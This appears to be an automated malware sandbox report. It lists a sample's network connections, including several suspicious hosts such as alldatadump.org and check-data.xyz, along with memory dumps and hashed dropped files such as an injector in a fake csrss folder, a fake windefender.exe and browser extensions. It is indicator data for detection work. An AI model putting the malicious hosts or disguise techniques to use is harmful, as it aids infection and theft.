NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 104.21.31.124:443 jonathantwo.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.209:80 185.172.128.209 tcp
GB 85.192.56.26:80 tcp
DE 185.172.128.228:80 tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
NL 82.145.216.24:443 download.opera.com tcp
US 104.18.10.89:443 download5.operacdn.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
GB 2.16.27.215:443 download3.operacdn.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
CH 172.217.210.127:19302 stun4.l.google.com udp
BG 185.82.216.108:443 server1.alldatadump.org tcp
FR 185.93.2.246:443 download.iolo.net tcp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
BG 185.82.216.108:443 server1.alldatadump.org tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 104.26.8.59:443 tcp
N/A 224.0.0.251:5353 udp
US 34.117.186.192:443 tcp
BG 185.82.216.108:443 server1.alldatadump.org tcp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
GB 142.250.187.238:443 clients2.google.com tcp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
US 44.239.141.158:80 api4.check-data.xyz tcp
BG 185.82.216.108:443 server1.alldatadump.org tcp

Files

memory/4960-0-0x000002890B300000-0x000002890B336000-memory.dmp

memory/4960-1-0x00007FFE2DAC0000-0x00007FFE2E582000-memory.dmp

memory/4960-2-0x000002890D100000-0x000002890D110000-memory.dmp

memory/4960-3-0x000002890D040000-0x000002890D09E000-memory.dmp

memory/4284-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4284-5-0x0000000074E60000-0x0000000075611000-memory.dmp

memory/4284-6-0x00000000056B0000-0x00000000056C0000-memory.dmp

memory/4960-7-0x00007FFE2DAC0000-0x00007FFE2E582000-memory.dmp

C:\Users\Admin\Pictures\IxskVchc2rUcLuGjAA6X3uRx.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe

MD5 91a5c37b8ffaf4337e6a180b53cb3bc9
SHA1 f26e6a9a0469259358bf11d7520d97b1a1217d0d
SHA256 0a8a918a87480164a28ff60fb51ca3fc54afdf9ebce43343a8f2c05c2431ce46
SHA512 6d968aca48c66fd2207308aeeb5dfd3e9eec4a523a8fa31259352eee359018772b41095b87453bea548b45c3f35fc22a2855ab11a1269705839fde3c8439c294

memory/3076-30-0x0000000001C70000-0x0000000001D70000-memory.dmp

memory/3076-31-0x0000000001BE0000-0x0000000001C52000-memory.dmp

memory/3076-32-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe

MD5 513e1df3bd8755c988baf3f682d3abc0
SHA1 909fa3f20c167213d94c6edc50bb43672d8cb41e
SHA256 9f8af4317529d2b35ddafa1b74a2379695cf0c68ef2639141fe0e875692b9e9d
SHA512 c838f5520bbd320c53a7daa536eef16cc819abf509b973d570e93a7906c5dafa569e07a81c11b73637daf8ff8e03aa508ef0825f3e5a36c8d98b3764cadb4ba4

memory/3400-42-0x0000000001AC0000-0x0000000001BC0000-memory.dmp

memory/3400-43-0x0000000003720000-0x0000000003747000-memory.dmp

memory/3400-44-0x0000000000400000-0x0000000001A19000-memory.dmp

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe

MD5 7ea234dfc011f40047e769b15ebe661b
SHA1 5a779733891b290d45b3009eb4ceb17c41a2401d
SHA256 c7c0f3e7c270835c0af43a4103d9ef95f85f3ce48d7ab7863d1d3a2fae1847c8
SHA512 71f90fcd6f1c72ab8e9498ff811982db7dd0aa28bb384e8642b3dd75db7b699d853725930eba629e7fa27449bd876a70c8be2619ebc09f514ae06cde714bc9fd

memory/3044-56-0x0000000003B90000-0x0000000003F8E000-memory.dmp

memory/3044-57-0x0000000003F90000-0x000000000487B000-memory.dmp

memory/3400-58-0x0000000000400000-0x0000000001A19000-memory.dmp

memory/3044-59-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3800-71-0x0000000003AE0000-0x0000000003EE7000-memory.dmp

memory/3800-72-0x0000000003FF0000-0x00000000048DB000-memory.dmp

memory/3800-73-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4284-75-0x0000000074E60000-0x0000000075611000-memory.dmp

memory/1472-74-0x0000000002F70000-0x0000000002FA6000-memory.dmp

memory/3320-76-0x0000000005760000-0x0000000005D8A000-memory.dmp

memory/1472-77-0x0000000074E60000-0x0000000075611000-memory.dmp

memory/3320-79-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4284-81-0x00000000056B0000-0x00000000056C0000-memory.dmp

memory/1472-80-0x00000000034A0000-0x00000000034B0000-memory.dmp

memory/1472-78-0x00000000034A0000-0x00000000034B0000-memory.dmp

memory/3320-82-0x0000000005500000-0x0000000005522000-memory.dmp

memory/1472-83-0x0000000005A70000-0x0000000005AD6000-memory.dmp

memory/1472-84-0x0000000006260000-0x00000000062C6000-memory.dmp

memory/3076-85-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/3320-94-0x0000000074E60000-0x0000000075611000-memory.dmp

memory/1472-104-0x00000000062D0000-0x0000000006627000-memory.dmp

memory/3320-103-0x0000000003090000-0x00000000030A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enkhxx5j.h4u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3320-105-0x00000000063A0000-0x00000000063BE000-memory.dmp

memory/1472-106-0x0000000006840000-0x000000000688C000-memory.dmp

memory/1472-107-0x0000000006D10000-0x0000000006D56000-memory.dmp

C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

MD5 749cb9cb3ce89a03fdd97a9aaf96e895
SHA1 73ecd478ace66e1dfb7aeed8ed061af48214a46f
SHA256 85aeb0eca144912f0713ac4e8392e2645a91bb4ba8e2ffa55e5bf834665170af
SHA512 ac0afac898ab53a3277b4d1aef90af246ca8596872a6a61bbf47817c1ea038fc4394094a4d14d2cc0aa94aeaf1435f9ccc7cf7143010ff581fd4256dc653bd31

memory/3076-118-0x0000000001C70000-0x0000000001D70000-memory.dmp

memory/4544-119-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4544-120-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4544-122-0x00007FFE4E460000-0x00007FFE4E51D000-memory.dmp

memory/4544-121-0x00007FFE4E460000-0x00007FFE4E51D000-memory.dmp

memory/4544-125-0x00007FFE00030000-0x00007FFE00031000-memory.dmp

memory/4544-123-0x00007FFE4E960000-0x00007FFE4EB69000-memory.dmp

memory/4544-124-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4544-127-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4544-129-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4544-128-0x00007FFE00000000-0x00007FFE00002000-memory.dmp

memory/3044-126-0x0000000003B90000-0x0000000003F8E000-memory.dmp

memory/4544-130-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/1472-131-0x0000000007BA0000-0x0000000007BD4000-memory.dmp

memory/1472-139-0x000000006FC20000-0x000000006FC6C000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/3320-141-0x000000006FC20000-0x000000006FC6C000-memory.dmp

memory/3320-151-0x000000006FC70000-0x000000006FFC7000-memory.dmp

memory/1472-153-0x000000007F7C0000-0x000000007F7D0000-memory.dmp

memory/1472-152-0x0000000007C00000-0x0000000007C1E000-memory.dmp

memory/1472-162-0x0000000007C20000-0x0000000007CC4000-memory.dmp

memory/3320-163-0x000000007FD40000-0x000000007FD50000-memory.dmp

memory/4544-142-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/1472-164-0x00000000034A0000-0x00000000034B0000-memory.dmp

memory/1472-140-0x000000006FC70000-0x000000006FFC7000-memory.dmp

memory/3320-165-0x0000000007FB0000-0x000000000862A000-memory.dmp

memory/3320-166-0x0000000007970000-0x000000000798A000-memory.dmp

memory/3044-169-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3320-170-0x00000000079B0000-0x00000000079BA000-memory.dmp

memory/3320-171-0x0000000007AC0000-0x0000000007B56000-memory.dmp

memory/1472-172-0x0000000007DD0000-0x0000000007DE1000-memory.dmp

memory/3320-173-0x0000000007A20000-0x0000000007A2E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 d0c46cad6c0778401e21910bd6b56b70
SHA1 7be418951ea96326aca445b8dfe449b2bfa0dca6
SHA256 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 eab44ef09ff53b0b440726d9e99fe2b8
SHA1 b5b0bb8c080c91df8098a5befedd85714b3728c0
SHA256 bdc52185fcfe83799d64f12acda8ff4bb1e2271cf8ecd5566d317bf4ca381f35
SHA512 d8923b3f1edbdfcc7961f0b91d819a8759e76e66339393e8a57854bcf22e7c14947bdb5926abe98acfb1f82d53e75a6e8cdf559aeafb64f9a239a563856d7758

memory/3076-190-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe

MD5 aaa56797070369ad346fbd9bb6cc5e8b
SHA1 a1d01943f0a354d3a000628262671254ca6a91b8
SHA256 9d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905
SHA512 e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

MD5 a1fd806ca74149c35531a1e3a2393d75
SHA1 1dc87223d20652050b12da2f0a53f590ff51de4e
SHA256 1950956104ea0c283a5637d2e93f3e72567b76abb94b4a4b85886677bdbc63e2
SHA512 cede4de9aad1141d2d07dcde2dae24b8a37384fc086998de62f84f5a1360c8ce55e4dff98d8e72ae82f324651976f27a8c220cdc0a2dd7e32dc33d1f7cfe60e8

C:\Users\Admin\AppData\Local\Temp\Opera_installer_240419140451252724.dll

MD5 0415cb7be0361a74a039d5f31e72fa65
SHA1 46ae154436c8c059ee75cbc6a18ccda96bb2021d
SHA256 bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798
SHA512 f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e

C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe

MD5 e77964e011d8880eae95422769249ca4
SHA1 8e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256 f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA512 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 2d2eaed72f3c0bca2efca23f872b8d03
SHA1 4eae0462f7f20c123f371e7f272fd7b85fd963b1
SHA256 186993d12206ef03a80fb73573eaba923807cd14402bc283fa8435ceadef6d2c
SHA512 18bd0921206027ae62b42c1be782f8b680cb834d2e2e3b14911019bef0df88e7b78e03ac9181ec47fae5e8db4cf9bfd71dbc7d8fabded1127069e9ce705eddeb

memory/2088-278-0x0000000010000000-0x0000000013BC3000-memory.dmp

memory/3044-285-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac4917a885cf6050b1a483e4bc4d2ea5
SHA1 b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256 e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e551d16d266fd9a87c1546cd6a17a2a1
SHA1 75e07eac6bd2847263ebdd3e3d6554f7e84a3fb7
SHA256 6a56781f81b2ac1667df447ddb1f3a95841462a1feea881da7bce3f6052de3fa
SHA512 6b23550766e3bb721bdbc44d6adb3ae0109af53ab5e2ce5d2b758f9d25fa98e9e51b720348b19c5a7ee8e609e50d114695f0cae74ec50be9d37d0ddd2afb6a4a

memory/2884-401-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1300-402-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3076-412-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3d463ad4d47edae6fb5c59808b189b01
SHA1 b342815e0d5f1261fefed9e81f85933a1008f631
SHA256 27fa5f6f659e0c953fb91452fdcba0608c13688d6b2dfc49f07d5990d2654897
SHA512 4658ec7c7b8cb4ee0e707c21821522afe71dd74a3a7a3cb5f2edfa940dbdc21c80b5ea0facae86bc3a2d21d202273365c091c80777eb977f64a807ad277d620d

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2eb7ddfe080963f17d1a98a206f451f3
SHA1 3fae68ea468ffb977c253ee305d2d5dbfc2b9b3a
SHA256 8a7a3233c9f5e236aaa8955a5e5d34e70dfbda94a331b8964417504a104da305
SHA512 4b24473e38c2672d76ce2a2963ab57fa492b7dd63a8f837654d9030511b92a2870de78584cff9b62ccf5bcfa2e5ae0e90ef7bbc82456da218d5299e940ebe3dd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9878501afeb3907eb77aac797e8f316c
SHA1 3ba608ba045824715f5e091fbd23526898048f29
SHA256 f4b1f3cc33472d99dbcd69f9ed991325dd60ac768a532426fc01366ba0d10b69
SHA512 ee332060e76fc393db52438935d20ab16a926797314585e6f936a36c5b30ce9c4a579a466449a3cc781fb8030891adea0ee01c1dc1f97d7f91d05260af8725e8

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 08f8a9a86de8f7cc6fafb8e2c414679e
SHA1 a2638a3a83ac547a87bece9efdac65cc32a1f2b7
SHA256 9a98e1d84f3100cb65885ef765a83abd14527275dd28c2eab942dfb1ed8eb65f
SHA512 f78420f6841db879d2a9d21d6f83035e2c196ed224fea825459a077539ad6824120932d658627b5b8a3f976f72683c3133b0cd2401bb8cefb278f994f9b98409

memory/2884-518-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1300-529-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ac916d15974261d0ce21c8fc71620bf7
SHA1 6e64cd2c69ee374cfcd9999f13fd908042c52469
SHA256 c241b8dcd3d5bbb2e8dc956cdf346f080e4c69bc8ecd1bc5ed01cd7cf1641451
SHA512 501e1116349bb290b0ab1a60a4ea49e5cee18b86d21399be11eef748d2d4d1a96534db5ac4db7867b8424fd0f8c73ef7c139043003531da81af4e24dd66ea8b2

memory/2172-564-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\opera_package

MD5 5014156e9ffbb75d1a8d5fc09fabdc42
SHA1 6968d1b5cec3039e53bbbedeee22e2d43d94c771
SHA256 7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802
SHA512 bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\additional_file0.tmp

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

MD5 976bc8e5fe65f9bb56831e20f1747150
SHA1 f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256 f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA512 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbghelp.dll

MD5 544255258f9d45b4608ccfd27a4ed1dd
SHA1 571e30ceb9c977817b5bbac306366ae59f773497
SHA256 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA512 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbgcore.dll

MD5 9ebb919b96f6f94e1be4cdc6913ef629
SHA1 31e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256 fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512 a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700

C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/3076-649-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/2172-674-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1424-676-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/1072-686-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-698-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1424-701-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2172-742-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1460-743-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-750-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/244-758-0x0000000010000000-0x0000000013BC3000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/1460-784-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-783-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9e74ed00e926c59becad69a5caa346a
SHA1 de60ae4e1749a56690f1d774ccb4ab725005a3c4
SHA256 7dbdeb170717f76e81ab1142469c05994e25c9a17bc21b503e9d6484a70210e2
SHA512 5c74c472f5d356a6c83f4656362034a11f02f57dc27ac14aab914e0567495ffb0d45b5f348734e9ab9c1f5c9374a39f99111312bb29b4a55394e8aaf13f32b80

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 8679b2ab6610d033f5c98beb5063989a
SHA1 44dbd2010f4821d0134fbafb57ee9465d12150f3
SHA256 b56bf1ef6e30f1f0e7109627e8859a8270e7c2d290b0d5183d083c7ed0c083a8
SHA512 f3c4200896b69c1dc9c4db2e5bab7a4bddc9c253eee7aa4e63b8f6b337a6a5e9feaf03cb86455230e91509ddb29a6b78d1f7139111690e9b1b3ef0a3c246bea6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 ef6984033cbe2419e353faffb46dc4cc
SHA1 0e938ec38d1780bb65af4fb846af4c5246ec656b
SHA256 8ce3d7b37e0253f2299825378a133f8c5c98d41e34523eae48fb84aaf2d2c134
SHA512 c80c500d4c49b5cc34510843f9b709c6eced8f5a9cc98d95c7be0146889c0d2fe6231302a72b0f3445f512973aa30c11d61477ae1303cc2cd5f3f4f629dc7f90

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js

MD5 21d1dbcbff005cc27d3ee4c8b5d40e15
SHA1 4ba78901a2cc94f8e41e3f4ed908eff46751baf6
SHA256 65f3e18ba77d36a9dc6a26a7085fa68d2a5afeafe6a400dee5f6aecb06f5fcf5
SHA512 14dbaeb2bc4a14751c79203988f7897fccfb9a8261bb5908ec7a231a9b49a5a5612a2e3b6e52d4755299941018466c8f3020c6b7669d3aa362f177c87a0270e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 db3aec3ef659a65b6676644336d0f8c4
SHA1 83c05ee25a84c6ff136694f19b4bbd0ee34bd997
SHA256 4231e2fd0fcad36fda58f669884b508bdb308a45becc9821c181f3a18aed48de
SHA512 73802b69af66d2c4ebd2cf401e7ff17f2d632307ea7253bf5b8a673c8e90c254abb01ad739a14b2a5cc8e9358e6beae59abc92c127bd2447a24eed43a6ba19af

C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe

MD5 31fdaf5dfa78088a896093d9ff996ee0
SHA1 ae94f8a18af6de6be9ef3cba0e77d541b6455a00
SHA256 657aaac97ab7af616faa4836e62b708448e44f157ff5fa221d8ef6d889930789
SHA512 5afc90626d59d1639fe9b014cccaf8d88fbdbdb4be64add8c35fd14f993b8571cae343c7fda4d535c0968ab790530db9df18a1b229fb17b7d793531a3c42d006